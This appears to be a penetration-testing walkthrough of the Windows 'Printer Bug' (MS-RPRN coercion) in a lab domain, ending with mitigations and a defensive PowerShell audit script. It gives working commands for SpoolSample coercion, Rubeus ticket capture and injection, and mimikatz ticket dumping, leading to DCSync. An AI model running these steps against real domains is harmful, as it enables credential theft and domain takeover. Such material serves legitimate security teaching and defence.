Printer Bug

Definition

The Printer Bug refers to a feature of the Windows Print System Remote Protocol (MS-RPRN) that adversaries abuse: an adversary with a domain user account can use the MS-RPRN RpcRemoteFindFirstPrinterChangeNotification method to force any machine running the Spooler service to authenticate to an attacker-controlled machine (one that has unconstrained delegation) via Kerberos or NTLM, thereby capturing the machine account's TGT.

Theory & Background

According to Microsoft Docs, MS-RPRN is based on the Remote Procedure Call (RPC) protocol and supports synchronous printing and spooling operations between a client and server, including print job control and print system management.

The above flow can be found at this link.

This abuse only executes the first two methods (RpcOpenPrinter and RpcRemoteFindFirstPrinterChangeNotificationEx) and stops once the notification method returns a nonzero Windows error code. Only the initial connection between the target (print server) and the attacker's machine (the unconstrained-delegation server) is needed for the Printer Bug. The RpcOpenPrinter call must return ERROR_SUCCESS for the abuse to proceed.

Forest Trusts

A trust is a relationship established between domains that enables users of one domain to access the resources/services of another domain. There are two categories of trust:

  1. Default Trusts

  2. Other Trusts

Default Trusts

When a new domain is added to the root domain, two-way transitive trusts are created by default.

Other Trusts

These are the trusts explicitly created by a domain admin.

For the Printer Bug, we only consider domains/forests that have a two-way trust between them.

Abuse

After compromising a machine that has unconstrained delegation, the attacker might compromise the Domain Controller in the same domain or in a different domain (child-parent relationship, or a forest with bi-directional trust) by abusing this printer bug.

My lab environment for this walkthrough is:

  1. sqlsvr.redwolf.local - Machine to which we have access and that has unconstrained delegation configured

  2. redwolf-dc.redwolf.local - Domain Controller of the domain redwolf.local.

  3. flab-dc.flab.redwolf.local - Domain Controller of the child domain flab.redwolf.local.

Execution Flow

  1. Attacker compromises a system that has unconstrained delegation configured.

  2. Attacker finds a potential system (mostly DCs) that can be abused.

  3. Attacker uses MS-RPRN to force the system to authenticate to the attacker-controlled machine.

    1. This is done via the RPC API RpcRemoteFindFirstPrinterChangeNotification, which allows print clients to subscribe to notifications of changes on the print server.

    2. Once this API is called, the target system attempts to authenticate to the compromised host, and the machine account's TGT is captured.

  4. Attacker gets the TGT of the machine account and impersonates it in the domain to escalate privileges.

We can check whether the spooler service is running on a target host like so:

ls \\<TARGET_HOST>\pipe\spoolss

If spoolss is not running, we receive an error.

Use Rubeus in monitor mode to capture the TGT; you can also use mimikatz to dump the cached TGTs.

.\Rubeus.exe monitor /interval:3
mimikatz # sekurlsa::tickets

SpoolSample by @tifkin_ can be used to exploit the printer bug. We execute it with two arguments: target (a DC with spoolss running) and server (the machine with unconstrained delegation configured).

.\SpoolSample.exe <TARGET> <SERVER>
.\SpoolSample.exe redwolf-dc sqlsvr
.\SpoolSample.exe flab-dc sqlsvr

Once the TGT is captured, we can use it to escalate privileges. Again I will be using Rubeus for this purpose.

.\Rubeus.exe ptt /ticket:<CAPTURED_TGT>

Since we have injected FLAB-DC$'s TGT into LSASS, we can now perform a DCSync attack.

Mitigation:

  1. Domain Controllers and AD admin systems need to have the Print Spooler service disabled. It is recommended to do this via GPO.

  2. Remove unconstrained delegation from accounts and replace it with constrained delegation (Domain Controllers have unconstrained delegation enabled by default).
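As an added example (not part of the original notes), the following PowerShell audits both mitigation points above: it lists every account carrying the unconstrained-delegation flag (flagging non-DCs as findings) and reports the Print Spooler state on each DC. It assumes the ActiveDirectory RSAT module, Windows PowerShell 5.1 (Get-Service -ComputerName), and rights to query services on the DCs.

```powershell
# Audit script for the two Printer Bug mitigations (added example, not from the page).
# Assumes: ActiveDirectory module (RSAT), Windows PowerShell 5.1, remote service-query rights.
Import-Module ActiveDirectory

# userAccountControl bit 0x80000 (524288) = TRUSTED_FOR_DELEGATION (unconstrained delegation).
# The OID 1.2.840.113556.1.4.803 is the LDAP bitwise-AND matching rule.
$uacFilter = '(userAccountControl:1.2.840.113556.1.4.803:=524288)'

# Domain controllers are expected to carry the flag; anything else should be remediated.
$dcNames = Get-ADDomainController -Filter * | Select-Object -ExpandProperty Name

Write-Host '== Accounts with unconstrained delegation =='
$computers = Get-ADComputer -LDAPFilter $uacFilter -Properties userAccountControl
$users     = Get-ADUser     -LDAPFilter $uacFilter -Properties userAccountControl

foreach ($c in $computers) {
    $isDc = $dcNames -contains $c.Name
    [PSCustomObject]@{
        Account = $c.SamAccountName
        Type    = 'Computer'
        Finding = if ($isDc) { 'expected (Domain Controller)' }
                  else       { 'remove unconstrained delegation; use constrained delegation' }
    }
}
foreach ($u in $users) {
    # User accounts should never be trusted for unconstrained delegation.
    [PSCustomObject]@{
        Account = $u.SamAccountName
        Type    = 'User'
        Finding = 'remove unconstrained delegation'
    }
}

Write-Host '== Print Spooler state on Domain Controllers =='
foreach ($dc in $dcNames) {
    $svc = Get-Service -ComputerName $dc -Name Spooler -ErrorAction SilentlyContinue
    $status = if ($null -eq $svc) { 'not found / unreachable' } else { "$($svc.Status) ($($svc.StartType))" }
    # Desired state per the mitigation above: Stopped and Disabled (enforced via GPO).
    $ok = ($null -ne $svc) -and ($svc.Status -eq 'Stopped') -and ($svc.StartType -eq 'Disabled')
    [PSCustomObject]@{
        DomainController = $dc
        Spooler          = $status
        Finding          = if ($ok) { 'ok' } else { 'disable Print Spooler on this DC' }
    }
}
```

Run it from a domain-joined admin workstation; every row whose Finding is not 'ok' or 'expected' corresponds to one of the two mitigations still outstanding.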
